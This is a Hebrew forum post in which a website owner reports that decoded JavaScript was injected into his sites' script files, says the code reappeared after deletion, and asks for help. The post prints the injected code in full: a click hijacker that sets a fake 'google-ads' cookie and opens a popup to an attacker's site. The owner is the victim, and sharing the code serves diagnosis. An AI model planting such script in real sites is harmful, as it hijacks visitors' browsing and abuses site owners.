יש לי כמות נכבדת של אתרים שיושבים על שרת של חברת Funio (שייכת לiWeb) לפני יומיים שמתי שבכל פעם שאני נכנס לאתרים שלי קופץ לי חלון פופאפ שמוביל לאתר אחר allfromnet נקודה נט (אני חדש באתר אז אני לא יכול להכניס קישורים עדיין)
האתרים שלי לא מקפיצים שום חלונות כך שידעתי שזה משהו בעייתי חיפשתי בין הקודים ומצאתי שמישהו שתל לי קוד בתוך חלק מקבצי הג׳אווה סקריפט של האתרהקוד הוכנס בקודים של אסקי והתרגום שלו הוא
function CCK(name,value,days){var date,expires;if(days){date=new Date();date.setTime(date.getTime()+(days*24*60*60*1000));expires=";expires="+dat e.toGMTString();}else{expires="";}document.cookie=name+"="+value+expires+";path=/";}function RCK(name){var i,c,ca,nameEQ=name+"=";ca=document.cookie.split(';');for(i=0;i<ca.length;i++){c= ca[i];while(c.charAt(0)==' '){c=c.substring(1,c.length);}if(c.indexOf(nameEQ)==0){return c.substring(nameEQ.length,c.length);}}return '';}if(RCK("google-ads-5854412595")!=1){var xol=window.onload;window.onload=function(){if(typeof xol=='function')xol();window.addEventListener("click",function(){CCK("google-ads-5854412595",1,1);window.open('פה נכנס שם האתר שלו');window.location.reload();},true);}}
בנוסף לכל הכאב ראש הזה
שמתי לב שהאתר שנפתח allfromnet נקודה נט (אני חדש באתר אז אני לא יכול להכניס קישורים עדיין)
לא רק ששתל קוד אלא האתר שנפתח הוא אתר שגנב את הנתונים שלו מתוך הDb שלי
למרות שנראה שהוא לא מחובר אונליין
היום בבוקר מחקתי את כל הקודים ובערב ראיתי שכול הקודים חזרו שוב
מה אני יכול לעשות ?

ציטוט ההודעה